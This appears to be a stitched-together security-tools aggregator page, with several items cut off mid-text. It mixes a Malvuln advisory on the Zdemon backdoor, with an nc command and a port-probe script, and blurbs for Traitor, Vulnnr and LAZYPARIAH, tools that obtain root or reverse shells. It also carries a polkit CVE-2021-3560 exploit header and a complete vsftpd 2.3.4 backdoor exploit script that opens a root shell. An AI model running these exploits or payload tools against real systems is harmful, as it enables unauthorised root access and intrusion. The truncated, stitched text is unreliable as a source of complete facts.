More @ https://skynettools.com
The Zdemon malware listens on TCP ports 31556 and 6051. Any third party who can reach an infected system can execute the commands the backdoor exposes, with no authentication required.
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/d12f38e959d70af76fd263aa1933033c.txt
Vulnerability: Unauthenticated Remote Command Execution
Description: Zdemon malware listens on TCP ports 31556, 6051. Third-party attackers who can reach infected systems can execute commands made available by the backdoor.
Vuln ID: MVID-2021-0313
nc64.exe x.x.x.x 31556
002 [ PC Details ]
User name : Victim
Computer name : DESKTOP-2C3IQHO
Registered owner :
Registered organisation :
Processor name : Intel64 Family…
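A quick way to find infected hosts on a network you own is to check whether anything accepts connections on the two ports the advisory names and to parse whatever "Key : Value" text comes back into the details block shown above. The script below is an added example for this page, not Malvuln's code. It assumes that a TCP accept on 31556 or 6051 is the indicator of interest and treats any returned text as opportunistic, since the excerpt shows the details block after the nc connection but does not say what prompts it; SAMPLE_BANNER is constructed from that excerpt, and serve_once is only a local stand-in so the scan can be exercised offline. An open port alone is not proof of infection, so the parsed details are kept alongside the hit for a human to confirm.

```python
"""Probe hosts for Zdemon's listener ports and parse the "Key : Value" block shown above.
Added example for this page; it is not Malvuln's code. Assumptions: a TCP accept on
31556 or 6051 is the indicator of interest, and whatever text the backdoor returns is
read opportunistically. SAMPLE_BANNER is constructed from the advisory excerpt."""
import socket
import threading

ZDEMON_PORTS = (31556, 6051)  # ports named in the advisory

# Constructed sample modelled on the output shown after `nc64.exe x.x.x.x 31556`
SAMPLE_BANNER = (
    "002 [ PC Details ]\r\n"
    "User name : Victim\r\n"
    "Computer name : DESKTOP-2C3IQHO\r\n"
    "Registered owner : \r\n"
    "Registered organisation : \r\n"
    "Processor name : Intel64 Family 6\r\n"
)


def parse_details(text):
    """Map each 'Key : Value' line to a dict entry; a '[ ... ]' header goes under 'section'."""
    details = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if "[" in line and line.endswith("]"):
            details["section"] = line[line.index("[") + 1:-1].strip()
        elif ":" in line:
            key, _, value = line.partition(":")
            details[key.strip()] = value.strip()
    return details


def probe(host, port, timeout=3.0, nbytes=4096):
    """Connect to host:port; return (accepted, text received before EOF or timeout)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            chunks = []
            try:
                while True:
                    data = s.recv(nbytes)
                    if not data:          # peer closed the connection
                        break
                    chunks.append(data)
            except socket.timeout:        # listener kept the socket open; keep what we have
                pass
            return True, b"".join(chunks).decode("utf-8", "replace")
    except OSError:                       # refused, unreachable, or connect timed out
        return False, ""


def scan(hosts, ports=ZDEMON_PORTS, timeout=3.0):
    """Return {(host, port): parsed_details} for every listener that accepted a connection."""
    hits = {}
    for host in hosts:
        for port in ports:
            accepted, banner = probe(host, port, timeout)
            if accepted:
                hits[(host, port)] = parse_details(banner)
    return hits


def serve_once(banner, host="127.0.0.1"):
    """Offline test helper: one-shot listener on an ephemeral port that sends `banner`
    and closes. Returns the port so scan() can run without a real infected host."""
    srv = socket.socket()
    srv.bind((host, 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def _run():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(banner.encode())
        srv.close()

    threading.Thread(target=_run, daemon=True).start()
    return port


if __name__ == "__main__":
    import sys
    for (h, p), info in scan(sys.argv[1:]).items():
        print(f"{h}:{p} accepted a connection; details: {info or 'none returned'}")
```

Run it as `python3 zdemon_probe.py 10.0.0.12 10.0.0.13` against hosts you are authorised to test; connecting to the backdoor is interacting with the malware, so keep the timeout short and log the hits rather than sending it anything.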
Traitor packages up a bunch of methods to exploit local misconfigurations and vulnerabilities (including most of GTFOBins) in order to pop a root shell.
It'll exploit most sudo privileges listed in GTFOBins to pop a root shell, as well as issues like a writable docker.sock or the recent polkit CVE-2021-3560. More routes to root will be added over time.
Run with no arguments to find potential vulnerabilities/misconfigurations which could allow privilege escalation. Add the -p flag if the current user password is known. The password will be requested if it’s needed to analyse sudo permissions etc.
Polkit 0.105-26 (Ubuntu) and 0.117-2 (Fedora) suffer from a local privilege escalation (LPE) vulnerability, CVE-2021-3560: an unprivileged user can gain root on the affected Linux system. Updating polkit is recommended to avoid exploitation.
# Exploit Title: Polkit 0.105-26 0.117-2 - Local Privilege Escalation
# Date: 06/11/2021
# Exploit Author: J Smith (CadmusofThebes)
# Vendor Homepage: https://www.freedesktop.org/
# Software Link: https://www.freedesktop.org/software/polkit/docs/latest/polkitd.8.html
# Version: polkit 0.105-26 (Ubuntu), polkit 0.117-2 (Fedora)
# Tested on: Ubuntu 20.04, Fedora 33
# CVE: CVE-2021-3560
# Source: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
# Set the name and display name
# Set the account as an administrator
# Set the password hash for 'password' and password hint
# Check Polkit…
A tool to efficiently discover and extract hostnames given a large set of target IP addresses. HostHunter uses simple OSINT techniques to map IP addresses to virtual hostnames and writes the reconnaissance results to a CSV or TXT file.
The latest version of HostHunter also takes screenshots of the targets; this is currently beta functionality.
- Tested with Python 3.7.2.
Linux / Mac OS
- Install python dependencies.
$ pip3 install -r requirements.txt
The next few steps are only required if you would like to use the Screen Capture feature.
- Download and install the latest version of…
Create a target list or select one target, scans then exploits, done!
Vulnnr is a vulnerability scanner and auto-exploiter. You can use it to check your website's security by finding vulnerabilities, or to get shells.
LFI Scanners > Coming soon
XSS Scanners > Working
SQLI injection scanners > Working
Domain Scanner > Using the HackerOne API / finds subdomains
CMS detector > Working
Server detector > Working
Common vulnerable files Scanner > Working
Directory Spider/Scanner > Working
Dorker > Working / uses Google's search engine / auto-exploits
Autodorker > Working, takes a list full of dorks (not recommended)
Vulnscan > Scans one target
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 9-04-2021
# Exploit Author: HerculesRD
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523
# vsftpd 2.3.4 backdoor (CVE-2011-2523): a USER value containing ":)" makes the
# trojaned daemon open a root shell on TCP/6200. telnetlib was removed in Python 3.13.
import argparse
from telnetlib import Telnet
from signal import signal, SIGINT
from sys import exit

def handler(signal_received, frame):
    # Handle any cleanup here
    print('   [+]Exiting...')
    exit(0)

signal(SIGINT, handler)
parser = argparse.ArgumentParser()
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()
host = args.host
portFTP = 21 #if necessary edit this line
user = "USER nergal:)"  # the smiley in the username is the backdoor trigger
password = "PASS pass"  # any value; the login itself does not need to succeed
tn = Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.") #if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")
tn2 = Telnet(host, 6200)  # the backdoor shell listens here once triggered
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()
# Exploit Title: ExpressVPN VPN Router 1.0 - Router Login Panel's Integer Overflow
# Date: 09-04-2021
# Exploit Author: Jai Kumar Sharma
# Vendor Homepage: https://www.expressvpn.com/
# Software Link: https://www.expressvpn.com/vpn-software/vpn-router
# Version: version 1
# Tested on: Windows/Ubuntu/MacOS
# CVE : CVE-2020-29238
*Proof of concept*:
The ExpressVPN router's login panel is served by an nginx web server; version 1 of the router firmware hosts the web login panel on a vulnerable nginx build.
ExpressVPN Summary: A publicly known bug in the Nginx server used by the ExpressVPN Router version 1.x firmware was reported. ExpressVPN no longer ships or supports that version and all users are encouraged to upgrade to the latest version…
AVAIN is a modular vulnerability analysis / penetration testing framework for computer networks and individual machines that allows its modules to work collaboratively to achieve more sophisticated results. Once you start an analysis with AVAIN, it uses its modules to enumerate, find vulnerabilities and assess the overall security level of an IP-based network or host. During the analysis, the most relevant results are shown directly in a comprehensible way. The complete and in depth results are saved for later to enable the user to fully retrace the assessment. In addition, AVAIN automatically aggregates certain types of results during the analysis…
LAZYPARIAH is a simple and easily installable command-line tool written in pure Ruby that can be used during penetration tests and capture-the-flag (CTF) competitions to generate a range of reverse shell payloads on the fly.
The reverse shell payloads that LAZYPARIAH supports include (but are not limited to):
- C binary payloads (compiled on the fly): c_binary, c_binary_b64, c_binary_gzip, c_binary_gzip_b64, c_binary_hex, c_binary_gzip_hex
- Ruby payloads: ruby, ruby_b64, ruby_hex, ruby_c
- Base64-encoded Python payloads: python_b64
- Rust binary payloads (compiled on the fly): rust_binary, rust_binary_b64, rust_binary_gzip, rust_binary_gzip_b64, rust_binary_gzip_hex, rust_binary_hex
- PHP scripts containing base64-encoded Python payloads called via the system() function: php_system_python_b64
- Java classes (compiled…